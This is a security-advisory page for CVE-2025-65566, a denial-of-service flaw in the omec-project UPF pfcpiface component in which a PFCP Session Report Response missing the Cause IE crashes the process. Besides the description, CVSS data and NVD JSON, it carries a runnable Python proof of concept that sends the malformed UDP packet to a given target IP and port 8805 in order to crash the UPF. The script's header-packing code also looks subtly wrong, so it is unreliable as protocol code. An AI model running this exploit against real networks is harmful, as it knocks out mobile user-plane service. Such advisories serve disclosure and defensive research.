Security Vulnerability Report
中文
CVE-2025-65566 CVSS 7.5 HIGH

CVE-2025-65566

Published: 2025-12-18 20:16:08
Last Modified: 2026-01-06 16:18:14
Source: [email protected]

Description

A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Session Report Response that is missing the mandatory Cause Information Element, the session report handler dereferences a nil pointer instead of rejecting the malformed message. This triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Report Response messages to the UPF's N4/PFCP endpoint can exploit this flaw to repeatedly crash the UPF and disrupt user-plane services.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:upf:2.1.3:dev:*:*:*:*:*:* - VULNERABLE
omec-project upf-epc-pfcpiface:2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65566 PoC - Malformed PFCP Session Report Response This PoC demonstrates sending a malformed PFCP Session Report Response without the mandatory Cause Information Element to trigger a nil pointer dereference in omec-project UPF pfcpiface component. Note: This is for educational and authorized testing purposes only. """ import socket import struct def build_pfcp_header(message_type, sequence_number, flags=0x20): """Build PFCP header with specified message type and sequence number""" version = 1 # PFCP version # Flags: 4 bits spare, 1 bit S-flag (SEID present), 1 bit M-flag (Message Flavour), 2 bits spare header = struct.pack('!BBHI', (version << 5) | flags, # Version and flags 0, # Message Type message_type, # Message Type sequence_number) # Sequence Number return header def build_malformed_session_report_response(): """ Build a malformed PFCP Session Report Response without Cause IE This triggers nil pointer dereference in vulnerable UPF versions """ # PFCP Header # Message Type for Session Report Response is 0x36 (54) header = build_pfcp_header(0x36, 0x000001) # Session Report Response IEs (without mandatory Cause IE) # Using minimal IEs to trigger the vulnerability ie_data = b'' # Node ID IE (optional, but helps identify the message) node_id_type = 0x01 # FQDN node_id_content = b'upf.example.com\x00' ie_data += struct.pack('!HH', 0x0010, len(node_id_content)) # IE Type 16, Length ie_data += bytes([node_id_type]) ie_data += node_id_content # Padding to 4-byte alignment if len(ie_data) % 4 != 0: ie_data += b'\x00' * (4 - len(ie_data) % 4) return header + ie_data def send_malformed_pfcp_message(target_ip, target_port=8805): """ Send malformed PFCP Session Report Response to target UPF """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) malformed_msg = build_malformed_session_report_response() print(f"[*] Sending malformed PFCP Session Report Response to {target_ip}:{target_port}") print(f"[*] Message length: {len(malformed_msg)} bytes") print(f"[*] Message hex: {malformed_msg.hex()}") try: sock.sendto(malformed_msg, (target_ip, target_port)) print("[+] Malformed message sent successfully") print("[!] If target is vulnerable, UPF process should crash with panic") except Exception as e: print(f"[-] Error sending message: {e}") finally: sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python3 cve-2025-65566-poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8805 send_malformed_pfcp_message(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65566", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:16:07.647", "lastModified": "2026-01-06T16:18:14.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Session Report Response that is missing the mandatory Cause Information Element, the session report handler dereferences a nil pointer instead of rejecting the malformed message. This triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Report Response messages to the UPF's N4/PFCP endpoint can exploit this flaw to repeatedly crash the UPF and disrupt user-plane services."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:upf:2.1.3:dev:*:*:*:*:*:*", "matchCriteriaId": "F5D98CF2-1D67-4E3A-B8AA-6B5F6D2FF666"}]}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/958", "source": "[email protected]", "tags": ["Exploit", "Patch", "Issue Tracking"]}, {"url": "https://github.com/omec-project/upf/issues/958", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.